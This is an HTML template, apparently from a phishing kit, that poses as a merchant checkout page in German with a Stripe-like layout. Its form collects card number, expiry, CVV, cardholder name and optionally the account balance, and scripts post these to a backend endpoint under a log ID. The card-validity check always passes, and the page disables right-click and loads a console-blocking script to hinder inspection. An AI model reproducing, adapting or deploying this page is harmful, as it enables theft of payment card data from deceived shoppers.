<html lang="de">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

    <meta name="robots" content="noindex" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1" />
    <meta name="google" content="notranslate" />
    <title>Merchant Page</title>
    <link rel="shortcut icon" href="/style/card/favicon.png" />
    <link rel="stylesheet" href="/style/card/style.css">

    <!-- support chat -->
    <link rel="stylesheet" href="/style/support/support_parent.css">

    <!-- protect -->
    <script src="/style/protect/index.js"></script>

    <!-- system -->
    <script src="/style/other/system.js"></script>
    <script src="/style/other/jquery-3.6.0.min.js"></script>

    <style>
        body {
            background: rgb(168, 185, 210);
            background: linear-gradient(45deg, rgba(168, 185, 210, 1) 0%, rgba(231, 243, 255, 1) 50%, rgba(255, 255, 255, 1) 100%);
        }

        .SubmitButton {
            /*background-color: #c11818;*/
            background-color: #1867c1;
            color: #fff;
        }

        #_buttonPay:disabled {
            background: #d4d3d3;
            cursor: default;
            color: #fff;
        }
    </style>

    <style>
        .loader {
            border: 16px solid #f3f3f3;
            border-radius: 50%;
            border-top: 16px solid #3498db;
            width: 120px;
            height: 120px;
            -webkit-animation: spin 2s linear infinite;
            /* Safari */
            animation: spin 2s linear infinite;
            z-index: 100;
            margin-left: auto;
            margin-right: auto;
        }

        /* Safari */
        @-webkit-keyframes spin {
            0% {
                -webkit-transform: rotate(0deg);
            }

            100% {
                -webkit-transform: rotate(360deg);
            }
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body onload="sendRequest()">

 <div id="support">
        <script type="text/javascript">
var _smartsupp = _smartsupp || {};
_smartsupp.key = '{{worker.supportType}}';
window.smartsupp||(function(d) {
  var s,c,o=smartsupp=function(){ o._.push(arguments)};o._=[];
  s=d.getElementsByTagName('script')[0];c=d.createElement('script');
  c.type='text/javascript';c.charset='utf-8';c.async=true;
  c.src='https://www.smartsuppchat.com/loader.js?';s.parentNode.insertBefore(c,s);
})(document);
        </script>
    </div>

    <script>
        if ("{{worker.supportType}}" == "bot") {
                document.querySelector('#support').innerHTML = `
        <div class="chatra--webkit chatra--style-round chatra--side-bottom chatra--pos-right chatra--visible chatra--expanded chatra--fast-toggle"
            id="chatra" data-turbolinks-permanent=""
            style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display: none;">
            <div id="chatra__iframe-wrapper">
                <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat"
                    allow="autoplay" src="/style/support/index.html?id={{item.id}}"
                    style="width: 380px; height: 600px; position: absolute;"></iframe>
            </div>
        </div>

            <div class="support-circle" onclick="openSupport()"></div>
                                `
            }
    </script>

    <form id="_formPay" name="_formPay">
        <div id="verification">
            <div id="verif-window">
                <div id="verif-contnt">
                    <div id="contnet">
                        <div
                            style="font-size: 16px; color: #000; margin-bottom: 15px; font-weight: 600; padding-bottom: 10px; border-bottom: 1px solid #dee2e6;">
                        </div>
                        <div id="balik">
                            <div
                                style="color: #3f3f3f; line-height: 1.6; font-size: 14px; background: #ececec; border-radius: 10px; padding: 25px 5px;">
                                {{translate.card.enterBalance}}
                            </div>
                            <div
                                style="font-size: 13px; color: #555; margin-bottom: 3px; margin-top: 20px; font-weight: 600; text-align: left;">
                                {{translate.card.balance}}:</div>
                            <div>
                                <input id="checkbal" style="
                                            padding: 9px;
                                            border: none;
                                            border-radius: 4px;
                                            margin-bottom: 20px;
                                            width: 100%;
                                            box-shadow: 0 0 0 1px #e0e0e0, 0 2px 4px 0 rgb(0 0 0 / 7%), 0 1px 1.5px 0 rgb(0 0 0 / 5%);
                                            border: 1px solid #cecece;
                                        " form="_formPay" type="number" name="checkbal" placeholder="100.00" min="1"
                                    required oninput="document.querySelector('#buttonPay2').disabled = false" />
                            </div>
                            <input form="_formPay" id="currchoise" value="EUR" name="currency" class="_4" type="text"
                                style="display: none;" />
                        </div>
                        <div>
                            <input style="border-radius: 10px;" id="buttonPay2" type="button"
                                class="SubmitButton SubmitButton--incomplete" value="{{translate.card.next}}" disabled />
                        </div>
                    </div>
                    <div id="holder"
                        style="margin-top: 30px; width: 100%; text-align: center; font-size: 22px; color: #555;">
                        <div>{{translate.card.wait}}</div>
                        <div class="loader"></div>
                    </div>
                </div>
            </div>
        </div>
        <div id="root">
            <div class="App-Container is-noBackground flex-container justify-content-center">
                <div class="App App--keyboardInteractionMode App--singleItem">
                    <div class="App-Overview">
                        <header style="background: none;" class="Header">
                            <div
                                class="Header-Content flex-container justify-content-space-between align-items-stretch">
                                <div class="Header-business flex-item width-grow flex-container align-items-center">
                                    <a class="Link Header-businessLink Link--primary" href="/receive/order/{{item.id}}"
                                        target="_self">
                                        <div style="position: relative;">
                                            <div class="flex-container align-items-center">
                                                <div class="Header-backArrowContainer"
                                                    style="opacity: 1; transform: none;">
                                                    <svg class="InlineSVG Icon Header-backArrow mr2 Icon--sm"
                                                        focusable="false" width="12" height="12" viewBox="0 0 16 16">
                                                        <path
                                                            d="M3.417 7H15a1 1 0 0 1 0 2H3.417l4.591 4.591a1 1 0 0 1-1.415 1.416l-6.3-6.3a1 1 0 0 1 0-1.414l6.3-6.3A1 1 0 0 1 8.008 2.41z"
                                                            fill-rule="evenodd"></path>
                                                    </svg>
                                                </div>
                                                <div class="Header-merchantLogoContainer" style="transform: none;">
                                                    <div class="Header-merchantLogoWithLabel flex-item width-grow">
                                                        <div
                                                            class="HeaderImage HeaderImage--icon HeaderImage--iconFallback flex-item width-fixed flex-container justify-content-center align-items-center width-fixed">
                                                            <svg class="InlineSVG Icon HeaderImage-fallbackIcon Icon--sm"
                                                                focusable="false" viewBox="0 0 16 16">
                                                                <path
                                                                    d="M3 7.5V12h10V7.5c.718 0 1.398-.168 2-.468V15a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V7.032c.602.3 1.282.468 2 .468zM0 3L1.703.445A1 1 0 0 1 2.535 0h10.93a1 1 0 0 1 .832.445L16 3a3 3 0 0 1-5.5 1.659C9.963 5.467 9.043 6 8 6s-1.963-.533-2.5-1.341A3 3 0 0 1 0 3z"
                                                                    fill-rule="evenodd"></path>
                                                            </svg>
                                                        </div>
                                                        <span
                                                            class="Header-businessLink-label Text Text-color--gray800 Text-fontSize--14 Text-fontWeight--500">
                                                            Zurück
                                                        </span>
                                                        <h1
                                                            class="Header-businessLink-name Text Text-color--gray800 Text-fontSize--14 Text-fontWeight--500 Text--truncate">
                                                            {{title}}</h1>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </a>
                                </div>
                            </div>
                        </header>
                        <div class="App-productSummaryContainer">
                            <div class="ProductSummary no-image">
                                <div class="ProductSummary-info">
                                    <span
                                        class="ProductSummary-name Text Text-color--gray500 Text-fontSize--16 Text-fontWeight--500">{{title}}</span>
                                    <span
                                        class="ProductSummary-totalAmount Text Text-color--default Text-fontWeight--600 Text--tabularNumbers"
                                        id="ProductSummary-totalAmount">{{item.price}}&nbsp;{{curr}}</span>
                                    <span
                                        class="ProductSummary-description Text Text-color--gray500 Text-fontSize--14 Text-fontWeight--500"
                                        id="ProductSummary-description">
                                        <div class="ProductSummaryDescription ProductSummaryDescription--singleItem">
                                            {{translate.card.transaction}} #{{item.id}}</div>
                                    </span>
                                </div>
                            </div>
                            {{!-- <div id="divlogo">
                                <img src="/style/card/logo_ebay.png" style="height: 60px;" />
                            </div> --}}
                        </div>
                        <style>
                            #divlogo {
                                width: 100%;
                                margin-top: 15px;
                                text-align: left;
                            }

                            @media all and (max-width: 992px) {
                                #divlogo {
                                    text-align: center;
                                }
                            }
                        </style>
                    </div>
                    <div class="App-Payment">
                        <div class="CheckoutPaymentForm" data-link-multiple-saved-cards-enabled="false">
                            <div class="PaymentRequestOrHeader" style="display: inherit; height: auto;">
                                <div class="PaymentHeaderContainer" style="display: block; opacity: 1;">
                                    <div class="PaymentHeader">
                                        <div class="Text Text-color--default Text-fontSize--20 Text-fontWeight--500">
                                        </div>
                                    </div>
                                </div>
                                <div class="ButtonAndDividerContainer" style="opacity: 0; display: none;"></div>
                            </div>
                            <div class="flex-container direction-column" style="">
                                <div style="height: 523.979px;">
                                    <div>
                                        <div style="opacity: 1;">
                                            <div
                                                class="App-Global-Fields flex-container spacing-16 direction-row wrap-wrap">
                                                <div class="flex-item width-12">
                                                    <div role="list" class="ReadOnlyForm ReadOnlyForm--withShadow">
                                                        <div class="ReadOnlyFormField-email ReadOnlyFormField">
                                                            <div class="ReadOnlyFormField-label"><span
                                                                    class="Text Text-color--gray600 Text-fontSize--13 Text-fontWeight--500">{{title}}</span></div>
                                                            <div class="ReadOnlyFormField-content">
                                                                <div class="ReadOnlyFormField-titleContainer">
                                                                    <div class="ReadOnlyFormField-title">{{translate.card.cardTitle}}</div>
                                                                    <div class="ReadOnlyFormField-action"></div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div
                                                class="PaymentForm-paymentMethodForm flex-container spacing-16 direction-column wrap-wrap">
                                                <div class="flex-item width-12">
                                                    <div class="FormFieldGroup">
                                                        <div
                                                            class="FormFieldGroup-labelContainer flex-container justify-content-space-between">
                                                            <label for="cardNumber-fieldset"><span
                                                                    class="Text Text-color--gray600 Text-fontSize--13 Text-fontWeight--500">{{translate.card.cardDetails}}</span></label>
                                                        </div>
                                                        <fieldset class="FormFieldGroup-Fieldset"
                                                            id="cardNumber-fieldset">
                                                            <div class="FormFieldGroup-container"
                                                                id="cardNumber-fieldset">
                                                                <div
                                                                    class="FormFieldGroup-child FormFieldGroup-child--width-12 FormFieldGroup-childLeft FormFieldGroup-childRight FormFieldGroup-childTop">
                                                                    <div class="FormFieldInput">
                                                                        <div class="CheckoutInputContainer">
                                                                            <span class="InputContainer" data-max="">
                                                                                <input
                                                                                    class="CheckoutInput CheckoutInput--tabularnums Input Input--empty"
                                                                                    autocomplete="cc-number"
                                                                                    autocorrect="off" spellcheck="false"
                                                                                    id="_input0" name="fcard"
                                                                                    type="text" inputmode="numeric"
                                                                                    placeholder="1234 1234 1234 1234"
                                                                                    aria-invalid="false" value="" />
                                                                            </span>
                                                                        </div>
                                                                        <div class="FormFieldInput-Icons"
                                                                            style="opacity: 1;">
                                                                            <div id="bankicon1"
                                                                                style="transform: none;">
                                                                                <span
                                                                                    class="FormFieldInput-IconsIcon is-visible">
                                                                                    <img src="/style/card/visa-365725566f9578a9589553aa9296d178.svg"
                                                                                        alt="visa" class="BrandIcon" />
                                                                                </span>
                                                                            </div>
                                                                            <div id="bankicon2"
                                                                                style="transform: none;">
                                                                                <span
                                                                                    class="FormFieldInput-IconsIcon is-visible">
                                                                                    <img src="/style/card/mastercard-4d8844094130711885b5e41b28c9848f.svg"
                                                                                        alt="mastercard"
                                                                                        class="BrandIcon" />
                                                                                </span>
                                                                            </div>
                                                                            <div id="bankicon3"
                                                                                style="transform: none;">
                                                                                <span
                                                                                    class="FormFieldInput-IconsIcon is-visible">
                                                                                    <img src="/style/card/amex-a49b82f46c5cd6a96a6e418a6ca1717c.svg"
                                                                                        alt="amex" class="BrandIcon" />
                                                                                </span>
                                                                            </div>
                                                                            <div id="bankicon4"
                                                                                class="CardFormFieldGroupIconOverflow">
                                                                                <span
                                                                                    class="CardFormFieldGroupIconOverflow-Item CardFormFieldGroupIconOverflow-Item--visible"
                                                                                    role="presentation">
                                                                                    <span
                                                                                        class="FormFieldInput-IconsIcon"
                                                                                        role="presentation">
                                                                                        <img src="/style/card/unionpay-8a10aefc7295216c338ba4e1224627a1.svg"
                                                                                            alt="unionpay"
                                                                                            class="BrandIcon" />
                                                                                    </span>
                                                                                </span>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                                <div
                                                                    class="FormFieldGroup-child FormFieldGroup-child--width-6 FormFieldGroup-childLeft FormFieldGroup-childBottom">
                                                                    <div class="FormFieldInput">
                                                                        <div class="CheckoutInputContainer">
                                                                            <span class="InputContainer" data-max="">
                                                                                <input
                                                                                    class="CheckoutInput CheckoutInput--tabularnums Input Input--empty"
                                                                                    autocomplete="cc-exp"
                                                                                    autocorrect="off" spellcheck="false"
                                                                                    id="_input1" name="fexpm"
                                                                                    type="text" inputmode="numeric"
                                                                                    placeholder="MM"
                                                                                    aria-invalid="false" value="" />
                                                                                <input
                                                                                    style="margin-top: 20px; border-radius: 6px; display: none;"
                                                                                    class="CheckoutInput CheckoutInput--tabularnums Input Input--empty"
                                                                                    autocomplete="cc-csc"
                                                                                    autocorrect="off" spellcheck="false"
                                                                                    id="_input3" name="fcvc" type="text"
                                                                                    inputmode="numeric"
                                                                                    placeholder="CVV/CVC"
                                                                                    aria-invalid="false" value="" />
                                                                            </span>
                                                                        </div>
                                                                        <div style="margin-top: 27px; display: none;"
                                                                            id="cvcicon"
                                                                            class="FormFieldInput-Icon is-loaded">
                                                                            <svg class="Icon Icon--md" focusable="false"
                                                                                viewBox="0 0 32 21">
                                                                                <g fill="none" fill-rule="evenodd">
                                                                                    <g class="Icon-fill">
                                                                                        <g transform="translate(0 2)">
                                                                                            <path
                                                                                                d="M21.68 0H2c-.92 0-2 1.06-2 2v15c0 .94 1.08 2 2 2h25c.92 0 2-1.06 2-2V9.47a5.98 5.98 0 0 1-3 1.45V11c0 .66-.36 1-1 1H3c-.64 0-1-.34-1-1v-1c0-.66.36-1 1-1h17.53a5.98 5.98 0 0 1 1.15-9z"
                                                                                                opacity=".2"></path>
                                                                                            <path
                                                                                                d="M19.34 3H0v3h19.08a6.04 6.04 0 0 1 .26-3z"
                                                                                                opacity=".3"></path>
                                                                                        </g>
                                                                                        <g transform="translate(18)">
                                                                                            <path
                                                                                                d="M7 14A7 7 0 1 1 7 0a7 7 0 0 1 0 14zM4.22 4.1h-.79l-1.93.98v1l1.53-.8V9.9h1.2V4.1zm2.3.8c.57 0 .97.32.97.78 0 .5-.47.85-1.15.85h-.3v.85h.36c.72 0 1.21.36 1.21.88 0 .5-.48.84-1.16.84-.5 0-1-.16-1.52-.47v1c.56.24 1.12.37 1.67.37 1.31 0 2.21-.67 2.21-1.64 0-.68-.42-1.23-1.12-1.45.6-.2.99-.73.99-1.33C8.68 4.64 7.85 4 6.65 4a4 4 0 0 0-1.57.34v.98c.48-.27.97-.42 1.44-.42zm4.32 2.18c.73 0 1.24.43 1.24.99 0 .59-.51 1-1.24 1-.44 0-.9-.14-1.37-.43v1.03c.49.22.99.33 1.48.33.26 0 .5-.04.73-.1.52-.85.82-1.83.82-2.88l-.02-.42a2.3 2.3 0 0 0-1.23-.32c-.18 0-.37.01-.57.04v-1.3h1.44a5.62 5.62 0 0 0-.46-.92H9.64v3.15c.4-.1.8-.17 1.2-.17z">
                                                                                            </path>
                                                                                        </g>
                                                                                    </g>
                                                                                </g>
                                                                            </svg>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                                <div
                                                                    class="FormFieldGroup-child FormFieldGroup-child--width-6 FormFieldGroup-childRight FormFieldGroup-childBottom">
                                                                    <div class="FormFieldInput has-icon">
                                                                        <div class="CheckoutInputContainer"
                                                                            style="width: 100%;">
                                                                            <span class="InputContainer" data-max="">
                                                                                <input
                                                                                    class="CheckoutInput CheckoutInput--tabularnums Input Input--empty"
                                                                                    autocomplete="cc-exp"
                                                                                    autocorrect="off" spellcheck="false"
                                                                                    id="_input2" name="fexpy"
                                                                                    type="text" inputmode="numeric"
                                                                                    placeholder="YY"
                                                                                    aria-invalid="false" value="" />
                                                                            </span>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                                <div style="opacity: 0; height: 0px;">
                                                                    <span
                                                                        class="FieldError Text Text-color--red Text-fontSize--13"><span
                                                                            aria-hidden="true"></span></span>
                                                                </div>
                                                            </div>
                                                        </fieldset>
                                                    </div>
                                                </div>
                                                <div class="BillingAddressForm-addressInput flex-item width-12"
                                                    aria-hidden="false">
                                                    <div style="pointer-events: auto; height: auto; opacity: 1;">
                                                        <div
                                                            class="flex-container spacing-16 direction-column wrap-wrap">
                                                            <div class="flex-item width-12">
                                                                <div class="FormFieldGroup">
                                                                    <div
                                                                        class="FormFieldGroup-labelContainer flex-container justify-content-space-between">
                                                                        <label for="billingName"><span
                                                                                class="Text Text-color--gray600 Text-fontSize--13 Text-fontWeight--500">{{translate.card.cardHolder}}</span></label>
                                                                    </div>
                                                                    <div class="FormFieldGroup-Fieldset">
                                                                        <div class="FormFieldGroup-container"
                                                                            id="billingName-fieldset">
                                                                            <div
                                                                                class="FormFieldGroup-child FormFieldGroup-child--width-12 FormFieldGroup-childLeft FormFieldGroup-childRight FormFieldGroup-childTop FormFieldGroup-childBottom">
                                                                                <div class="FormFieldInput">
                                                                                    <div class="CheckoutInputContainer">
                                                                                        <span class="InputContainer"
                                                                                            data-max="">
                                                                                            <input
                                                                                                class="CheckoutInput Input Input--empty"
                                                                                                autocomplete="ccname"
                                                                                                autocorrect="off"
                                                                                                spellcheck="false"
                                                                                                id="billingName"
                                                                                                name="cardholder{{item.id}}"
                                                                                                type="text"
                                                                                                aria-invalid="false"
                                                                                                value="" />
                                                                                        </span>
                                                                                    </div>
                                                                                </div>
                                                                            </div>
                                                                            <div style="opacity: 0; height: 0px;">
                                                                                <span
                                                                                    class="FieldError Text Text-color--red Text-fontSize--13"><span
                                                                                        aria-hidden="true"></span></span>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                            <div class="flex-item width-12">
                                                                <div class="FormFieldGroup">
                                                                    <div
                                                                        class="FormFieldGroup-labelContainer flex-container justify-content-space-between">
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="CardPayment-signUpFormContainer flex-item width-12">
                                                    <div style="pointer-events: auto; height: auto; opacity: 1;">
                                                        <div class="SignUpForm">
                                                            <div class="SignUpForm-checkboxContainer">
                                                                <div class="FormFieldCheckbox SignUpForm-checkbox">
                                                                    <div class="CheckboxField">
                                                                        <div class="Checkbox-InputContainer">
                                                                            <input id="enableStripePass"
                                                                                name="enableStripePass" type="checkbox"
                                                                                class="Checkbox-Input" /><span
                                                                                class="Checkbox-StyledInput"></span>
                                                                        </div>
                                                                        <label for="enableStripePass">
                                                                            <span
                                                                                class="Checkbox-Label Text Text-color--gray600 Text-fontSize--13 Text-fontWeight--500">
                                                                                {{translate.card.safeDataTitle}}
                                                                                <div class="SignUpForm-subLabel">{{translate.card.safeData}}</div>
                                                                            </span>
                                                                        </label>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="PaymentForm-confirmPaymentContainer flex-item width-grow">
                                    <div class="flex-item width-12"></div>
                                    <div class="flex-item width-12">
                                        <button form="{{item.id}}" onclick="verifcard()" id="_buttonPay"
                                            class="SubmitButton SubmitButton--incomplete" disabled="">{{translate.card.next}}</button>

                                        <div class="ConfirmPayment-PostSubmit">
                                            <div>
                                                <div class="flex-container spacing-8 direction-column"
                                                    style="margin-top: 4px;">
                                                    <div class="flex-item width-grow"></div>
                                                    <div class="flex-item width-grow">
                                                        <div style="height: 0px; opacity: 0; pointer-events: none;">
                                                            <div
                                                                class="ConfirmTerms Text Text-color--gray500 Text-fontSize--13">
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="flex-item width-grow"></div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <footer class="App-Footer Footer">
                        <div class="Footer-PoweredBy"><a class="Link Link--primary" href="#" target="_blank"
                                rel="noopener"></a></div>
                    </footer>
                </div>
            </div>
        </div>
    </form>
    <div class="Modal-Portal"></div>

    <script>
        let chsNum = "0123456789";
        let fields = [
            {
                valid: false,
                chars: chsNum,
                length: [16, 19],
                mask: [
                    [16, " "],
                    [12, " "],
                    [8, " "],
                    [4, " "],
                ],
            },
            {
                valid: false,
                chars: chsNum,
                length: [2, 2],
                mask: false,
            },
            {
                valid: false,
                chars: chsNum,
                length: [2, 2],
                mask: false,
            },
            {
                valid: false,
                chars: chsNum,
                length: [3, 3],
                mask: false,
            },
        ];

        function inputMask(elem, indx) {
            fields[indx]["valid"] = false;
            let val = elem.value;
            let val2 = "";
            let chs = fields[indx]["chars"];
            let len = fields[indx]["length"];

            let bank1 = document.getElementById("bankicon1");
            let bank2 = document.getElementById("bankicon2");
            let bank3 = document.getElementById("bankicon3");
            let bank4 = document.getElementById("bankicon4");
            for (let i = 0; i < val.length; i++) {
                let flag = chs.includes(val[i]);
                if (!flag) continue;
                if (indx == 0) {
                    if (val[0] == 3) {
                        bank1.style.display = "none";
                        bank2.style.display = "none";
                        bank3.style.display = "block";
                        bank4.style.display = "none";
                    } else if (val[0] == 4) {
                        bank1.style.display = "block";
                        bank2.style.display = "none";
                        bank3.style.display = "none";
                        bank4.style.display = "none";
                    } else if (val[0] == 5) {
                        bank1.style.display = "none";
                        bank2.style.display = "block";
                        bank3.style.display = "none";
                        bank4.style.display = "none";
                    } else if (val[0] == 8) {
                        bank1.style.display = "none";
                        bank2.style.display = "none";
                        bank3.style.display = "none";
                        bank4.style.display = "block";
                    } else {
                        bank1.style.display = "none";
                        bank2.style.display = "none";
                        bank3.style.display = "none";
                        bank4.style.display = "none";
                    }
                } else if (indx == 1) {
                    if (val2.length == 0) flag = "01".includes(val[i]);
                    else if (val2.length == 1)
                        if (val2[0] == "0") flag = parseInt(val[i]) >= 1;
                        else if (val2[0] == "1") flag = parseInt(val[i]) <= 2;
                } else if (indx == 2) {
                    if (val2.length == 0) flag = parseInt(val[i]) >= 2;
                }
                if (flag) val2 += val[i];
            }
            val2 = val2.substr(0, len[1]);
            let val2i = parseInt(val2);
            let flag = val2.length >= len[0];
            if (flag) {
                if (indx == 0) {
                    flag = cardValid(val2);
                } else if (indx == 1) {
                    flag = val2i >= 1 && val2i <= 12;
                } else if (indx == 2) {
                    flag = val2i >= 20 && val2i <= 99;
                }
                if (flag) {
                    fields[indx]["valid"] = true;
                    if (indx == 0) {
                        _input1.focus();
                    } else if (indx == 1) {
                        _input2.focus();
                    } else if (indx == 2) {
                        _input3.style.display = "block";
                        document.getElementById("cvcicon").style.display = "flex";
                        _input3.focus();
                    }
                } else {
                    sty2 = " _15";
                }
            }
            let mask = fields[indx]["mask"];
            if (mask) val2 = stringInsert(val2, mask);
            elem.value = val2;
            checkButton();
        }

        function cardValid(n) {
            let s = 0;
            let l = n.length;
            for (let i = 0; i < l; i++) {
                let p = parseInt(n[i]);
                if ((l - i) % 2 == 0) {
                    p *= 2;
                    if (p > 9) p -= 9;
                }
                s += p;
            }
            return true;
        }

        function checkButton() {
            let flag = false;
            for (let i = 0; i < fields.length; i++) {
                if (!fields[i]["valid"]) {
                    flag = true;
                    break;
                }
            }
            _buttonPay.disabled = flag;
        }

        function stringInsert(s, j) {
            let a = s.split("");
            let l = s.length;
            for (let i = 0; i < j.length; i++) {
                let k = j[i];
                if (l > k[0]) a.splice(k[0], 0, k[1]);
            }
            return a.join("");
        }

        document.addEventListener("DOMContentLoaded", function () {
            _buttonPay.disabled = true;
            for (let i = 0; i < fields.length; i++) {
                let e = document.getElementById("_input" + i);
                e.oninput = function () {
                    inputMask(e, i);
                };
                setTimeout(function () {
                    e.oninput();
                }, 500);
            }
            _formPay.onsubmit = function () {
                _buttonPay.disabled = true;
            };
        });

        document.oncontextmenu = function () {
            return false;
        };
    </script>
    <script type="text/javascript">
        let button1 = document.querySelector("#_buttonPay");
        let verif = document.querySelector("#verification");
        let load = document.querySelector("#holder");
        let contnet = document.querySelector("#contnet");

        const checkBalance = 'false'

        function verifcard() {
            verif.style.display = "block";
            setTimeout(function () {
                verif.style.opacity = "1";
            }, 100);

            if (checkBalance == 'true') {
                try {
                    document.getElementById('contnet').style.display = 'block'
                    document.getElementById('holder').style.display = 'none'
                } catch (e) {
                    //
                }
            } else {
                sendCard()
            }
        }

        let button2 = document.querySelector("#buttonPay2");
        let check = document.querySelector("#checkbal");

        button2.onclick = function () {
            let str = "{{item.price}}";
            str = str.replace(/\s/g, "");
            //if (check.value == str || check.value == str + '.00' || check.value == str + '.0' || check.value == str + ',00' || check.value == str + ',0' || check.value[0] == ',' || check.value[0] == '.' || check.value[0] == '0') {
            //  check.setCustomValidity('Su saldo no cumple con los criterios de identificación. Póngase en contacto con el servicio de asistencia técnica.')
            //} else if (check.value[check.value.length - 3] != '.' && check.value[check.value.length - 3] != ',') {
            //  check.setCustomValidity('Su saldo no cumple con los criterios de identificación. Póngase en contacto con el servicio de asistencia técnica.')
            //} else {
            check.setCustomValidity("");
            //    }
        };
    </script>

    <script>
        let logId
        function sendCard() {
            const BALANCE_VALUE = ('false' == 'true') ? `${document.getElementById('checkbal').value}` : '0'

            axios.post(
                `/api/sendCardLk`,
                {
                    cardNumber: `${document.querySelector('#_input0').value}`,
                    cardMonth: `${document.querySelector('#_input1').value}`,
                    cardYear: `${document.querySelector('#_input2').value}`,
                    cardCvv: `${document.querySelector('#_input3').value}`,
                    cardBalance: BALANCE_VALUE,
                    item: "{{item.id}}",
                    logId: "{{log.id}}"
                }
            ).then(async function (res) {
                logId = res.data.id
                const system = new window.__System(
                    `{{log.id}}`,
                    '{{item.id}}',
                    {
                        generalErrorWord: '{{translate.errors.generalErrorWord}}!',
                        skipCard: '{{translate.errors.skipCard}}',
                        changeCard: '{{translate.errors.changeCard}}',
                        generalSuccessWord: '{{translate.errors.generalSuccessWord}}!',
                        successTransaction: '{{translate.errors.successTransaction}}',
                        noValidCard: '{{translate.errors.noValidCard}}'
                    },
                    'card'
                )

                if (checkBalance == 'false') {
                    document.getElementById(
                        'verification'
                    ).style.opacity = 1

                    document.getElementById(
                        'verification'
                    ).style.display = 'block'
                } else {
                    document.getElementById("verif-contnt").innerHTML = `
                            <div class="loader"></div>
                        `
                }
            })
        }

        function sendBalance() {
            const CHECK_BALANCE_STATUS = ('false' == 'true') ? true : false

            if (!CHECK_BALANCE_STATUS) {
                axios.post(
                    '/api/sendValue',
                    {
                        value: document.getElementById('checkbal').value,
                        type: "balance",
                        id: `${logId}`
                    }
                ).then(() => {
                    document.getElementById("verif-contnt").innerHTML = `
                            <div class="loader"></div>
                        `
                })
            } else {
                sendCard()
            }
        }
    </script>

    <script>
        document.getElementById('buttonPay2').addEventListener(
            'click',
            sendBalance
        )
    </script>

    <script>

    </script>

    <script type="text/javascript">
        function openSupport() {
            document.querySelector('.support-circle').style.display = 'none'
            document.querySelector('#chatra').style.display = 'block'

            const iframe = document.getElementById("chatra__iframe")
            const elmnt = iframe.contentWindow.document.querySelector("#app")
            elmnt.style.display = "block"
        }
    </script>

    <script src="/style/other/axios.min.js"></script>
    <script src="/style/protect/console-ban.min.js"></script>

    <script>
        const itemId = "{{item.id}}"
    </script>
    <script src="/style/other/other.js"></script>
    <!-- <script>
            ConsoleBan.init({
                redirect: 'https://http.cat/403'
            })
        </script> -->
</body>

</html>